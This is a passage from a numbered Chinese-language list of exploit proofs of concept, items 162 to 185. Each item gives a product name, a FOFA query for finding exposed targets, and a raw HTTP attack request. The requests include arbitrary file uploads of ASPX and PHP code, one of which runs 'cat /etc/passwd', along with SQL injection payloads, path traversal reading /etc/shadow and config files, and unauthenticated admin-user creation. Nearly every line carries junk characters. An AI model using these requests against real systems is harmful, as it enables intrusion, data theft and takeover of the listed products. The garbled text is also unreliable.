<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>8 Y4 W6 O- k- d$ b) c
<tag>3</tag>: M: r0 z2 g1 a7 l
</UploadResume>! n3 F: a, ^4 t, P' n3 Z& D
</soap:Body>
5 w' e# q5 x( m" r: P" n</soap:Envelope>) c3 f' e2 L, A3 N# j
6 p! b; @7 ~, l3 N# q% @& [9 _
3 }( [9 x/ A: Y7 b% D4 h1 `" xhttp://x.x.x.x/dizxdell.aspx
& L4 |4 I. ~, e% W+ M2 b
+ g- ~5 Q" q* Z( n% Y8 e162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
% l: P7 j5 z* X* v$ t1 O4 MFOFA: app="和丰山海-数字标牌"9 E; s! e8 a, _, j
POST /QH.aspx HTTP/1.11 @% [( r- T: o% s
Host: x.x.x.x1 ]( u7 j( o4 t# X0 I! Y" i: U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0, X1 g8 E5 f# w
Connection: close; ~. y4 U+ j8 X
Content-Length: 583
; Z+ I x- t' d# UContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey" A: `2 O% }; f7 j: l: U5 R! x$ A
Accept-Encoding: gzip" K% L7 }& \" W @- A2 L" n J
. D# G* \6 M( o! _, Q% n------WebKitFormBoundaryeegvclmyurlotuey% L( x* Q ^; ?" P
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
( A! V; Z3 ?7 w: gContent-Type: application/octet-stream
/ }$ _/ x% \$ e. }0 v4 X3 g" \4 h( ~( H4 ]' g
<% response.write("ujidwqfuuqjalgkvrpqy") %>- [6 c. O' c$ W4 Y. x- ]
------WebKitFormBoundaryeegvclmyurlotuey& X/ w5 y# Q1 r' n N
Content-Disposition: form-data; name="action"
/ C! v5 r, q6 K
- G8 A7 F+ {1 H: H4 e+ @/ @; Iupload
# r I% q5 D; y------WebKitFormBoundaryeegvclmyurlotuey/ u0 X& `' \/ E, u
Content-Disposition: form-data; name="responderId"6 y/ y5 Z5 D) ]2 ` H! ^& @' _/ }
% U( s0 m! E& Q( O) A; c: _ L0 d7 Z
ResourceNewResponder8 C/ i% y- g9 L3 u& @
------WebKitFormBoundaryeegvclmyurlotuey
6 s0 {; g! n$ v' rContent-Disposition: form-data; name="remotePath"/ C0 R; h; f. c1 X( S0 J
/ b5 o$ @# ~3 r( X, m/opt/resources; T' i: Q1 U4 {. ?
------WebKitFormBoundaryeegvclmyurlotuey--. T' I, G* `, {' I# {
# j1 F X! y( H$ K, p' X3 J, l @. i( x2 T: J: Q- x1 _1 v" e
http://x.x.x.x/opt/resources/kjuhitjgk.aspx8 _( L! F, u* ^3 H% V: {8 M2 C
* G! Q; g1 E2 X \- \. v
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传% x- z$ n+ A6 n' F0 W4 Q
FOFA: icon_hash="-795291075"- y" L/ \% b; r+ \$ l- }
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1! c# c5 j4 s B! a
Host: x.x.x.x
. P3 X6 o4 o6 H5 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
. y4 @* v3 r/ ?. {+ a3 e1 g" A2 b' MConnection: close7 D6 F6 r) H. }0 k+ r0 F
Content-Length: 293
T0 S5 J7 `$ H6 oAccept: */*
& p6 }. W1 n0 Z5 {3 Q3 o, {Accept-Encoding: gzip, deflate
; ?/ [! i3 _( f" c {0 QAccept-Language: zh-CN,zh;q=0.9
# S' t; j5 ^: V# l4 U% mContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod2 V8 K! l0 v. i. r) x- V0 n+ |& \ w! R
# M5 T' y7 o1 O2 t$ ]1 D- A------iiqvnofupvhdyrcoqyuujyetjvqgocod- l0 ?: e+ G% C: T$ V4 y
Content-Disposition: form-data; name="name"
) I. x6 E) ?2 }& m# u" ^; u% h( s5 v( T
1.php& r! a6 c" x4 n
------iiqvnofupvhdyrcoqyuujyetjvqgocod' p R4 V1 E x9 t
Content-Disposition: form-data; name="upfile"; filename="1.php"
' m8 H5 w) M# l i4 O7 F: B. T1 S& rContent-Type: image/jpeg
) t* u5 D" Y2 x% \; m
5 C: N3 o6 V! W `rvjhvbhwwuooyiioxega! G6 z, |. z- W
------iiqvnofupvhdyrcoqyuujyetjvqgocod--7 ^: }$ R& N; v8 T8 `1 N1 X0 _. s
* C1 V6 ~$ w; e8 e9 a- [# ~& D$ V7 H1 d" m8 y! E
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传" ]- g: d1 ]! c+ t- G" c
FOFA: title="智慧综合管理平台登入"- E4 v7 ?' W, y- C( ~
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1; N$ v. E& Y% ~; C
Host: x.x.x.x
# v5 p: L) Z9 v2 C8 m* E) R nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0- A3 j, |! w# X& r' j5 p0 |
Content-Length: 2883 R3 n4 U. Y& I
Accept: application/json, text/javascript, */*; q=0.01
% K. T% F- P1 `. PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,' { [- A9 p4 q) n, ?' I3 W! U
Connection: close
5 j \( V0 ] a+ z+ O- mContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
* B! E, }; u3 p' Z. MX-Requested-With: XMLHttpRequest; H: ^& y* L: R$ @9 r! w
Accept-Encoding: gzip6 G [% L C3 f* [. Y( I" o
5 Q2 U2 ^8 m- y8 G0 V8 x* Y) L------dqdaieopnozbkapjacdbdthlvtlyl
: n3 |2 p6 K/ r! ]Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
6 k/ s; H- p+ @) Z5 h9 X. P3 Y& LContent-Type: image/jpeg
}) N1 ]' v! |, O6 T- h g% X. o+ w4 z0 v. u* U7 @
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>' R9 s3 x, j7 m6 U8 l% D9 f' Y- L
------dqdaieopnozbkapjacdbdthlvtlyl-- X/ Y5 N2 N5 {6 ?1 B! E, D. }
# ^! W5 {8 }) U, \ N" s$ ]7 z; K
/ q; n; ^4 V* x- g5 y( Uhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
5 a+ B1 \5 x' T4 W8 I5 R; t
% q7 O: X- ~ L. l165. OrangeHRM 3.3.3 SQL 注入( M7 ]' d" ]8 D6 C8 {
CVE-2024-36428. g7 @$ b+ U( G+ k2 w6 `. N
FOFA: app="OrangeHRM-产品"
2 u" n0 K/ D: C; {: pURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))% b; T& }" A7 f, Q
r" y/ f; l" [" v+ z! G) v$ `
2 {- G4 `% h/ h x# Q166. 中成科信票务管理平台SeatMapHandler SQL注入
3 V) X6 C2 D+ p& ZFOFA:body="技术支持:北京中成科信科技发展有限公司"1 ^2 H! k6 Q3 K
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1* G6 }& H2 l$ c, e5 h/ O4 t
Host:4 N2 |/ H+ ^, Y
Pragma: no-cache
m8 y4 E; Z, nCache-Control: no-cache
7 v5 a: c, y) z: Z. @Upgrade-Insecure-Requests: 1
7 w1 E2 s* s! y6 W( uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36& j# n3 q7 E- C3 e2 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! {* ]$ c+ h5 Y/ _/ r+ _
Accept-Encoding: gzip, deflate
2 m9 ~' ?+ V/ UAccept-Language: zh-CN,zh;q=0.9,en;q=0.85 h- Z" y# D# m0 y* a, J9 [2 h, l
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
$ G& b/ o- ^( P5 OConnection: close
9 C2 r' D% ]) F/ Q3 dContent-Type: application/x-www-form-urlencoded
( ?! r5 }, X- s+ _/ l- aContent-Length: 89
" f/ R8 j! y. V- m( `# o
+ A; P6 f. m# DMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE c% F9 K. X6 U
/ s5 U6 @- u m. q- T4 B
* y* M: d+ D% G9 D v2 M+ L% [167. 精益价值管理系统 DownLoad.aspx任意文件读取
& a! d X# S8 D" B4 T% R: `1 [% IFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
/ b9 y! g* Q4 d! [! G' LGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1: U. [2 l" _$ _' u. r2 x
Host:
, i$ O. ^0 @3 T, X( k! g+ w# LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; P8 W7 w% n% y( I
Content-Type: application/x-www-form-urlencoded
[ y% t# Y s. pAccept-Encoding: gzip, deflate( L2 R6 ^8 Q, p- e4 U6 L, o, i
Accept: */*
* w1 I/ d2 L1 S1 J. WConnection: keep-alive. `- ^3 J& @$ J, Z3 x1 n: e5 u0 o8 E- M
9 J! O1 X8 ~# Q. W1 L
( T# N/ K! o' {3 M. C168. 宏景EHR OutputCode 任意文件读取/ K/ _$ d: X$ [+ I7 R/ D
FOFA:app="HJSOFT-HCM": B" I1 v- t# F7 Z0 n
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1) B# J" x* |+ `$ f
Host: your-ip) _! I0 W: ?& A9 Q1 {7 o1 C# [, u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36( S8 x$ Z7 Q- T" s8 N1 a3 V- ?
Content-Type: application/x-www-form-urlencoded
- Y) ^1 `3 U- s4 I" G) b- F0 e1 m9 LConnection: close
6 V" B$ A- G! h% M( S0 F5 Q& N: X8 a# z, \
9 B: D# R% n% p2 I2 Y: a, p
# t- G; R7 @1 G% Y
169. 宏景EHR downlawbase SQL注入
+ P4 O6 F5 G+ }$ P3 EFOFA:app="HJSOFT-HCM"9 Q/ @( L! M9 \ @4 k$ F' ^) j- z
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.11 p& ^$ _/ e" k, m L
Host: your-ip, t' Y& m- q4 Q! M, D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 X1 I4 Z! f; L5 S$ _6 P
Accept: */*
; P7 u& A, b) H) B% RAccept-Encoding: gzip, deflate
0 C- f: y9 x7 o" s6 s3 @Connection: close
% K3 C! @1 ?( @: S7 A v- N. j8 U- r! O! ]% P- b, [/ O+ R
% |: D2 z1 c2 o u" R# o* L! b# W) G- N
% T5 o- |, ?' z! }7 K) l( c170. 宏景EHR DisplayExcelCustomReport 任意文件读取0 d6 X( _1 a0 b8 v, f' p) \
FOFA:body="/general/sys/hjaxmanage.js") r1 C7 |) _0 U' M1 ?* @3 R5 X
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
; X T" P% n- w2 x% U! L2 l( wHost: balalanengliang
( D- }4 S+ X+ B$ C, V* }$ R; @# VUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. Z4 G/ W- M" J' B2 @, l2 l
Content-Type: application/x-www-form-urlencoded6 ]2 Q& E6 u% t" a, v! f
+ p5 z2 @2 Y7 j) z# {+ mfilename=../webapps/ROOT/WEB-INF/web.xml/ F- O! K: W; P: h" }; t \
# Z/ g: C9 M+ N }" Y4 t" A; y7 n
! v! P% u0 x5 P) k# o- C+ r171. 通天星CMSV6车载定位监控平台 SQL注入
) q+ ~% G* e8 g, K! xFOFA:body="/808gps/"
; D \. T/ R6 a! \GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
, W% ^. }! ]* ]# u7 M1 {Host: your-ip7 _- \# y& |# U5 a @& r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0; t3 K6 M4 e. Z& B' E
Accept: */*! Q. S; t, e* f& {" Y( a7 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 S- j) ?9 q9 ~! K [! {
Accept-Encoding: gzip, deflate
: f; t7 G# R8 y0 `, eConnection: close# W0 W% h: C1 p# G; K
7 e3 r# W# F( }' U( R
8 M9 E0 R6 m3 W; P: B
$ k$ \6 t. `& x) `* N- V7 ~172. DT-高清车牌识别摄像机任意文件读取0 R0 s) u- o6 i8 {
FOFA:app="DT-高清车牌识别摄像机"
9 ?6 b. b$ [, \6 k7 ]9 CGET /../../../../etc/passwd HTTP/1.15 ~( Z: q) @! h7 X/ f$ \* [
Host: your-ip
$ }5 W+ m$ x% c( f6 A4 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ J& I% B% Q3 t; E5 M- J9 `3 i
Accept-Encoding: gzip, deflate
" S0 z0 J$ H) S3 j4 m4 E' |8 U% VAccept: */*5 V, v' Q2 s+ D3 H3 G6 {
Connection: keep-alive
5 A% C. p# V. t- \, `1 \
1 N4 d" p+ a$ ^0 W" c3 J5 i- \" c) o {( J6 M, h; F6 R( L3 {! {" x
- V1 v0 C* e0 @% ^" K
173. Check Point 安全网关任意文件读取, p2 c) ^9 l, C9 x ?/ Z
CVE-2024-24919
' w2 q! A/ M/ g4 R0 RFOFA:app="Check_Point-SSL-Network-Extender"# j' N x- N b7 A3 I
POST /clients/MyCRL HTTP/1.1
9 k6 r/ ]0 h' X& a5 qHost: your-ip% v. u( p$ C- m
Content-Type: application/x-www-form-urlencoded+ B6 i+ n( U6 q6 M2 ~
# @7 x% Y+ [ g" |) iaCSHELL/../../../../../../../etc/shadow
/ j+ ^4 y& O/ x# E1 u ?. w
9 E* s& i! Q, {0 R% q
3 \, U$ m. h5 ~' `" U
# c. ]( z+ o' g174. 金和OA C6 FileDownLoad.aspx 任意文件读取
0 K$ F2 O! A* p, QFOFA:app="金和网络-金和OA"
7 P* ^- R$ h6 D' s9 bGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1: S7 _" P { ~7 ~' Y
Host: your-ip
( l) J+ ~ O6 M0 H& \) ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& s' d# T2 f0 S& hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 @" f4 W2 b$ u/ z! @2 m/ [Accept-Encoding: gzip, deflate, br
; L7 F' V2 z* N6 Q9 \6 aAccept-Language: zh-CN,zh;q=0.9+ Z0 m; w5 H4 A0 _( @
Connection: close
9 ^/ i Q4 p- Y% v6 v6 r0 M3 a- z G+ v6 [; q
1 v) {* q) W7 ? ~5 e. N& b
! y( z& J, Q" l9 l
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
4 R" t5 p' }9 b- C7 d, sFOFA:app="金和网络-金和OA". k/ s- o' J$ W, b- g, F
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.19 r% R9 {. O5 U' W
Host:4 {- ?, S: l' J( `' y5 Y( K4 z, }
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ |8 O& j5 s8 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 B1 M2 v0 g2 J2 k2 o! PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 [# P! b" a9 m- f& T
Accept-Encoding: gzip, deflate+ f: |; E+ G4 ^3 a2 E; [
Connection: close# _+ M4 p+ `/ s) A) c
Upgrade-Insecure-Requests: 1
# k2 B# F+ b9 a2 d, A3 ]2 m, |7 l$ i3 T: u* E" f0 D! i# c+ J
- {" n1 T% w' L2 m1 n" b9 _
176. 电信网关配置管理系统 rewrite.php 文件上传8 p" V! d3 \3 f& T2 E
FOFA:body="img/login_bg3.png" && body="系统登录"
- y: ?5 B2 [0 I; lPOST /manager/teletext/material/rewrite.php HTTP/1.10 h6 j+ W! P) C4 V
Host: your-ip
$ T8 w1 |( u% u* {" P9 J% \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
2 c" V+ W( L. Q: V2 b* K! YContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT% J" [) J: r. `. x
Connection: close
% _5 j% G4 D. \& \# v
. l7 ~/ f1 k& k" J% Q& g------WebKitFormBoundaryOKldnDPT% y" y/ d6 Q0 l+ G3 k2 S( E
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
" x$ w9 E! W; x* G* }Content-Type: image/png2 n- D! G5 N0 |, b: ~$ Y* O1 c# j# L
2 [4 F. q0 N8 K2 d/ j; |
<?php system("cat /etc/passwd");unlink(__FILE__);?>, U. A0 E. S3 I+ u
------WebKitFormBoundaryOKldnDPT/ v( G: O. C* c& Z) h* e! s( @
Content-Disposition: form-data; name="uploadtime"
% j- x3 ~/ e+ T4 Y0 z ; s2 j, p. Z( a+ ^
2 O: |& N( x+ A8 w------WebKitFormBoundaryOKldnDPT--3 i3 T) v2 V* Q# X9 Y
, f0 ~2 l$ o- d/ Y! ~) m0 o# I6 ?4 t+ `4 m$ t; X8 L; [2 y6 {! p2 I: u
9 r$ M/ |9 D, M& V; x177. H3C路由器敏感信息泄露
3 z3 I2 i9 \: H& k% E/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
H1 a$ f! s2 d( C, C2 o/userLogin.asp/../actionpolicy_status/../M60.cfg
8 J3 ]7 Q' F3 v+ P5 k) d* q, n/userLogin.asp/../actionpolicy_status/../GR8300.cfg
" M: s8 N- G; N* J# _( [4 z/userLogin.asp/../actionpolicy_status/../GR5200.cfg
$ Z8 D' L/ Z p% U7 F1 U: F/userLogin.asp/../actionpolicy_status/../GR3200.cfg
3 T- J) O4 @$ ^; o; y/userLogin.asp/../actionpolicy_status/../GR2200.cfg4 v* x+ A, Q; g8 G
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
2 E- I# a9 N5 I y; e1 l5 ` S/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg S+ b, a" l; _1 }$ `1 [
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg9 H G2 W* Y4 t* a
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg( e6 l8 d% |) w R0 f0 _
/userLogin.asp/../actionpolicy_status/../ER5200.cfg4 N* u Z+ F0 T' J
/userLogin.asp/../actionpolicy_status/../ER5100.cfg: J+ p! d- H$ o% I; {
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
1 i* ~' ~ U9 i$ W. T* d/userLogin.asp/../actionpolicy_status/../ER3260.cfg
, E; G4 j5 ]% Y* C& k' {0 G) n/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg7 c d9 L- I3 Q6 }9 y. I
/userLogin.asp/../actionpolicy_status/../ER3200.cfg1 `* I- I: {. ] ?
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg$ I- x4 G1 a, ^' z
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
9 @% e/ X, y- j8 }/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg+ i6 x1 e/ C" D' E, t" L/ S! v* [
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
% s# Q$ ~% v6 P$ {( z m/ l" T/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg4 f" u6 M5 D2 a! z% a2 o
3 m! I8 R) }0 G2 M; l4 r$ y- N* [% s: S0 e+ d
178. H3C校园网自助服务系统-flexfileupload-任意文件上传. H+ w/ t2 Y! h, L! o
FOFA:header="/selfservice"5 o' z8 M7 f/ ^* Q
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1: f2 E( z. w6 B4 w
Host: c0 ]* E: s5 X* d2 B9 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.366 T$ T: S$ Z4 }! _7 _0 n. ?
Content-Length: 252
7 m3 C$ l Y- a2 S+ P1 y6 lAccept-Encoding: gzip, deflate
7 j+ T. x4 z) w7 m7 W9 y6 \Connection: close
8 t- J: `) i+ V0 ^/ gContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l. k1 j; d2 w/ N- S! P
-----------------aqutkea7vvanpqy3rh2l9 ]. |9 D3 Z* `# r
Content-Disposition: form-data; name="12234.txt"; filename="12234"
( U$ [3 s/ c5 Y. ~Content-Type: application/octet-stream
" |3 G& v. ^1 L! J; XContent-Length: 255
4 v4 z9 C3 K" a1 i( |& u, k5 ^
& y& h0 \& H# Y# V$ i. P4 B- H12234) i4 O: D/ T1 J8 r; \3 z, K/ @
-----------------aqutkea7vvanpqy3rh2l--
) I& ]1 u9 X: x5 g7 H8 K" z8 X1 f3 k& E% L0 x
5 g I( X0 ]+ b: m6 V7 @9 @! e
GET /imc/primepush/%2e%2e/flex/12234.txt6 p% ]4 `, @* s# C
# L1 v3 K K& E6 k t1 o
' v8 a- t" g* E5 i: N179. 建文工程管理系统存在任意文件读取9 U4 i. C$ r; x2 t# p5 q
POST /Common/DownLoad2.aspx HTTP/1.1
/ o2 F% @. U/ I, }+ v) [3 ~Host: {{Hostname}}6 X) e8 i* @2 E) C7 ?
Content-Type: application/x-www-form-urlencoded" }. B0 Z$ z, r
User-Agent: Mozilla/5.0, h: m/ b( s/ W, \, P$ E: ]/ V
. l) y6 E; Q0 g
path=../log4net.config&Name=
5 m* w$ b; z! i: `: a0 ? n. C( _8 J* r3 i2 y3 S
4 x8 Z4 T. R! `0 l- U180. 帮管客 CRM jiliyu SQL注入
s& {' `& `3 oFOFA:app="帮管客-CRM"" ]& X9 u$ _' _& X0 N
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
0 J/ U- Z/ O) }: F! e& C$ }Host: your-ip
# N ?' t9 d0 C, N: _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, Y6 k% `5 w1 M6 ^6 L/ R! m6 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% R# U# \( f. U& r; D' d8 D
Accept-Encoding: gzip, deflate
$ P4 O9 t1 ^# a. K0 S% p7 a, P- ZAccept-Language: zh-CN,zh;q=0.9
, r8 _. O4 K$ J6 P! ]Connection: close
: W, }- D; e! k) A8 j5 U: j& d9 h
" W2 |1 K3 v; O# t j Q# l# W1 b; O
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
1 E. y1 }& ~3 N2 p% @FOFA:"PDCA/js/_publicCom.js"9 W% S/ z' Y7 L$ u! O
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1& P! c3 F6 r. q! k' R
Host: your-ip
5 M8 e; n! a! yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.366 F, R4 |$ v2 A5 O3 J8 m# U/ \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 Y3 {6 \) g+ W! D& ]
Accept-Encoding: gzip, deflate, br3 p' V" }; Q% L' z
Accept-Language: zh-CN,zh;q=0.9
8 b5 Z! @# |1 d' ]+ [/ }7 QConnection: close$ q2 T J2 `# _$ }( C4 E
Content-Type: application/x-www-form-urlencoded( B4 _( U. ~9 n K" E' ?
7 a2 [0 W! Q3 A5 l
5 W$ U( Z0 w) {4 a: C+ {( Zaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=207 X; Y$ F( P c
+ T* `. K( B B2 o7 P
/ [# [7 h( [$ R! E182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
5 @. G" ?3 ^# P; g U5 E. MFOFA:"PDCA/js/_publicCom.js"
5 d3 J- m, j% o# _POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
$ o/ a J! G. I! [" yHost: your-ip
6 J" r4 X7 p9 J% ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.369 v3 e7 M/ L$ ~5 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 L& T3 S; |' I f! S$ ]7 ^. ]Accept-Encoding: gzip, deflate, br1 E3 P, Q5 z' I O9 k* V
Accept-Language: zh-CN,zh;q=0.9
2 j, {3 R9 M7 RConnection: close3 H( J; Q& D' k& X4 y0 p
Content-Type: application/x-www-form-urlencoded3 N2 X4 h g9 i- M% d( g8 C. }
3 C( ], q3 p- M' ?
0 h- e" T- l; H% j0 l- Tusername=test1234&pwd=test1234&savedays=12 @$ v! l% H5 R# }: x9 J/ U: K7 J
# e8 H- I9 ?& {* t6 L0 S
$ E' F- T& Z* |) c: L% `/ s8 _; T183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
" o0 N: D/ `4 }8 oFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"# f8 B8 q+ u( D" n
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1) Y# G! b8 c; E. W( D
Host: your-ip( c+ E* ?6 [- u; A. M
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36% R) U* J8 ~4 w; {+ i7 Z# R
Accept-Charset: utf-89 k. w3 V& Y- r* F9 m) w0 N% d# R
Accept-Encoding: gzip, deflate
4 w& r0 M( Y6 I; {1 ~Connection: close
4 j- d/ Q$ T4 x0 u6 \; u. c! q
/ ]& a$ o. @1 H
8 d1 }: e3 L( l184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
! Q8 [4 M9 P0 [1 I" GFOFA:server="SunFull-Webs"+ t! D/ i" n7 o+ F
POST /soap/AddUser HTTP/1.1/ ^4 i# E) R( X T4 N2 }; T
Host: your-ip
+ V2 v" ]# J% b1 @7 kAccept-Encoding: gzip, deflate
" O3 ^7 u. v9 G6 x- l, bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
6 ?; A8 c0 l3 }7 ?8 f# A" J- P- ~% jAccept: application/xml, text/xml, */*; q=0.01/ l. C# C* a, I: Y3 E+ Q
Content-Type: text/xml; charset=utf-8
3 c" o, `& {) g4 k/ EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 E0 X% F2 r" b. d
X-Requested-With: XMLHttpRequest
/ Q4 D1 U! X Q8 d, @* O2 Z
# j+ H% {% C0 i3 M9 W: p- V2 r" K: O: E
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')' K5 R7 L* B5 |, Y) Y( C
* G0 v% p" i9 R6 Z6 [ q; B/ [
4 |; n* z6 ` N* y8 S# i$ b185. 瑞友天翼应用虚拟化系统SQL注入
1 A1 K: t: y6 Y! t% g- U5 Xversion < 7.0.5.1
. X4 j0 r* M! f1 ` N; ~' Q, XFOFA:app="REALOR-天翼应用虚拟化系统"
